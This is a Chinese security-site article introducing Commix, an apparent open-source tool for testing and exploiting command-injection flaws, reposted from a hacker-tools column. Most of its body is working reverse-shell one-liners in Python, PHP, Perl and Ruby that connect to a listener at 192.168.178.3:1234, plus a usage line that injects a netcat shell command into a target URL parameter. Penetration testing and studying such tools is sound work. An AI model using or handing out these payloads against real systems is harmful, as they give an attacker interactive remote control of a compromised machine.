Commix – 自动化命令注入测试与利用工具

华盟原创文章投稿奖励计划


项目首页:

https://github.com/stasinopoulos/commix

项目简介:

Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。

在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:

1. Python-reverse-shell:

python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


2. PHP-reverse-shell:

php-r'$sock=fsockopen("192.168.178.3",1234);exec("/bin/sh -i <%263 >%263 2>%263");'


3. Perl-reverse-shell:

perl-e'use Socket;$i="192.168.178.3";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S");open(STDOUT,">%26S");open(STDERR,">%26S");exec("/bin/sh -i");};'


4. Ruby-reverse-shell:

ruby-rsocket-e'exit 

if fork;c=TCPSocket.new("192.168.178.3",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

使用方法:

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"


对于具体的测试方法与利用模块的开发可以去其github进行阅读。

文章出处:黑客工具箱

本文来源黑客工具箱,经授权后由congtou发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论